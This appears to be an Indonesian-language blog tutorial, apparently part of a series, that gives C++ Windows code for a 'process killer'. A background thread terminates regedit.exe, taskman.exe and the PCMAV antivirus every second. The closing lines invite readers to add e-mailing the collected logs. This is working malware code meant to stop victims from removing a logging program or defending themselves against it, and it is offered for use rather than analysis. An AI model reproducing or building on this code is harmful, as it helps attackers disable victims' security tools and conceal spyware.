//fungsi proses killer HANDLE hProcessSnap; HANDLE hProcess; PROCESSENTRY32 pe32; void KillProc(char * szProcess) {      hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);      pe32.dwSize = sizeof(PROCESSENTRY32);      Process32First(hProcessSnap, &pe32);     //lakukan pengulangan sampai dapat :D      while(Process32Next(hProcessSnap, &pe32))      {         if(!strcmp(pe32.szExeFile, szProcess))         {                                      hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID);            TerminateProcess(hProcess, 0);         }      }      CloseHandle(hProcess);      CloseHandle(hProcessSnap); }

Penggunaan Killer Proses

1 2 3 4 5 6 7 8 9 10 11 12

//killer proses DWORD WINAPI terminator(LPVOID Param) {     while(1)     {         Sleep(1000);         KillProc("regedit.exe");         KillProc("taskman.exe");         KillProc("PCMAV.exe");     }     return EXIT_SUCCESS; }

Membuat thread baru untuk menjalankan fungsi monitoring dan killer proses:

1	CreateThread(NULL, 0, &terminator, NULL, 0, &id);

Oia fungsi tersebut, tulis di main.cpp..
Mengapa tidak membuat file .cpp baru dan menulis fungsi di file tsb? Hemmm.. Karena pada DevC++, pewarisan kelas membuat size program anda membengkak 100%. Entah mengapa, tidak seperti visual c++ buatan microsoft yang sudah dibekali optimasi pada kompilernya.

Mungkin dari anda, ada yang bertanya. Bagaimana dengan fungsi send lognya via e-mail? Owh itu tergantung kreativitas anda. Banyak referensinya.. hehe 

Akhir kata,selamat ber-coding dan berimajinasi =)

Salam Core I7,,

Read More